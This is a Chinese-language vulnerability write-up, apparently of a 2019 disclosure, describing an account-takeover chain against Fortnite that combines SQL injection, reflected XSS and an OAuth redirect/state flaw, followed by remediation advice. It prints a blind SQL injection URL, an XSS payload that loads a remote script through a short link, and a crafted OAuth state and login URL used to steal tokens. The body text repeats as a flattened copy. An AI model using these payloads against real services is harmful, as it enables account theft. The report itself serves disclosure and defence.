攻击Epic Games接管堡垒之夜账户
字数 1342 2025-08-27 12:33:42

Epic Games堡垒之夜账户接管漏洞分析报告

漏洞概述

本报告详细分析了Epic Games堡垒之夜游戏平台中发现的多个安全漏洞,这些漏洞可导致攻击者接管任意玩家账户。漏洞链包括SQL注入、跨站脚本攻击(XSS)和OAuth认证缺陷,最终实现无需用户凭证即可完全控制目标账户。

漏洞发现时间线

  • 发现时间:2019年1月前
  • 报告时间:2019年初
  • 修复时间:报告后已修复

技术细节分析

1. SQL注入漏洞

漏洞位置http://ut2004stats.epicgames.com/serverstats.php

漏洞特征

  • 参数server存在SQL注入
  • 服务器使用MySQL数据库
  • 存在WAF但采用黑名单过滤机制

利用方法

  • 使用if((SUBSTR(query, from, length)=CHAR([char_number])), true, false)条件判断
  • 通过响应包长度差异判断查询结果(4014字节为假,12609字节为真)
  • 使用系统变量@@version绕过WAF限制

示例利用

http://ut2004stats.epicgames.com/serverstats.php?server=if((SUBSTR(@@version,1,1)=CHAR(53)),37514065,0)

2. 跨站脚本攻击(XSS)

漏洞位置http://ut2004stats.epicgames.com/index.php?stats=maps

注入点SearchName参数

Payload示例

http://ut2004stats.epicgames.com/index.php?stats=maps&SearchName="><script src='//bit.ly/2QlSHBO'></script>

特点

  • 反射型XSS
  • 位于epicgames.com子域名,可绕过同源策略限制
  • 可通过短链接绕过WAF对长URL的限制

3. OAuth认证缺陷

漏洞位置:Epic Games SSO系统

核心问题

  • redirectUrl参数可控且未严格验证
  • state参数未经验证直接使用
  • 可重定向至包含XSS的Epic Games子域名

攻击流程

  1. 构造恶意state参数(包含Base64编码的JSON)
{
  "isPopup": "true",
  "isCreateFlow": "true",
  "isWeb": "true",
  "oauthRedirectUrl": "http://ut2004stats.epicgames.com/index.php?stats=maps&SearchName=\"\"><script src='//bit.ly/2QlSHBO'></script>"
}
  1. 通过SSO提供商(如Facebook)发起认证请求
https://www.facebook.com/dialog/oauth?client_id=1132078350149238&redirect_uri=https://accounts.epicgames.com/OAuthAuthorized&state=[Base64_encoded_state]&response_type=code&display=popup&scope=email,public_profile,user_friends
  1. 认证成功后,服务器将用户重定向至包含XSS的页面
  2. XSS执行窃取OAuth令牌

4. 完整攻击链

  1. 诱导用户点击恶意链接(通过社交工程)
  2. 用户被重定向至SSO登录页面
  3. 用户完成SSO认证
  4. 服务器将用户重定向至包含XSS的页面
  5. XSS执行并窃取OAuth令牌
  6. 攻击者使用令牌登录受害者账户

漏洞影响

  • 账户完全接管:查看个人信息、购买记录等
  • 虚拟货币盗窃:可购买V-Bucks等游戏内货币
  • 隐私泄露:获取用户真实姓名、地址、支付信息等
  • 聊天窃听:可访问游戏内聊天内容

修复建议

  1. 输入验证

    • 对所有用户输入进行严格验证
    • redirectUrlstate参数实施白名单机制

  2. XSS防护

    • 实施内容安全策略(CSP)
    • 对所有输出进行HTML编码

  3. SQL注入防护

    • 使用参数化查询
    • 升级WAF规则

  4. OAuth增强

    • 验证state参数完整性
    • 限制重定向URL范围

  5. 子域名管理

    • 定期审计老旧子域名
    • 统一安全标准

攻击演示视频

攻击视频Demo

总结

此漏洞链展示了现代Web应用安全中的典型问题组合:遗留系统漏洞、输入验证不足和认证流程缺陷。攻击者通过精心构造的攻击链,无需用户凭证即可完全接管账户,凸显了纵深防御和安全开发生命周期的重要性。

Epic Games堡垒之夜账户接管漏洞分析报告 漏洞概述 本报告详细分析了Epic Games堡垒之夜游戏平台中发现的多个安全漏洞,这些漏洞可导致攻击者接管任意玩家账户。漏洞链包括SQL注入、跨站脚本攻击(XSS)和OAuth认证缺陷,最终实现无需用户凭证即可完全控制目标账户。 漏洞发现时间线 发现时间 :2019年1月前 报告时间 :2019年初 修复时间 :报告后已修复 技术细节分析 1. SQL注入漏洞 漏洞位置 : http://ut2004stats.epicgames.com/serverstats.php 漏洞特征 : 参数 server 存在SQL注入 服务器使用MySQL数据库 存在WAF但采用黑名单过滤机制 利用方法 : 使用 if((SUBSTR(query, from, length)=CHAR([char_number])), true, false) 条件判断 通过响应包长度差异判断查询结果(4014字节为假,12609字节为真) 使用系统变量 @@version 绕过WAF限制 示例利用 : 2. 跨站脚本攻击(XSS) 漏洞位置 : http://ut2004stats.epicgames.com/index.php?stats=maps 注入点 : SearchName 参数 Payload示例 : 特点 : 反射型XSS 位于epicgames.com子域名,可绕过同源策略限制 可通过短链接绕过WAF对长URL的限制 3. OAuth认证缺陷 漏洞位置 :Epic Games SSO系统 核心问题 : redirectUrl 参数可控且未严格验证 state 参数未经验证直接使用 可重定向至包含XSS的Epic Games子域名 攻击流程 : 构造恶意 state 参数(包含Base64编码的JSON) 通过SSO提供商(如Facebook)发起认证请求 认证成功后,服务器将用户重定向至包含XSS的页面 XSS执行窃取OAuth令牌 4. 完整攻击链 诱导用户点击恶意链接(通过社交工程) 用户被重定向至SSO登录页面 用户完成SSO认证 服务器将用户重定向至包含XSS的页面 XSS执行并窃取OAuth令牌 攻击者使用令牌登录受害者账户 漏洞影响 账户完全接管 :查看个人信息、购买记录等 虚拟货币盗窃 :可购买V-Bucks等游戏内货币 隐私泄露 :获取用户真实姓名、地址、支付信息等 聊天窃听 :可访问游戏内聊天内容 修复建议 输入验证 : 对所有用户输入进行严格验证 对 redirectUrl 和 state 参数实施白名单机制 XSS防护 : 实施内容安全策略(CSP) 对所有输出进行HTML编码 SQL注入防护 : 使用参数化查询 升级WAF规则 OAuth增强 : 验证 state 参数完整性 限制重定向URL范围 子域名管理 : 定期审计老旧子域名 统一安全标准 攻击演示视频 攻击视频Demo 总结 此漏洞链展示了现代Web应用安全中的典型问题组合:遗留系统漏洞、输入验证不足和认证流程缺陷。攻击者通过精心构造的攻击链,无需用户凭证即可完全接管账户,凸显了纵深防御和安全开发生命周期的重要性。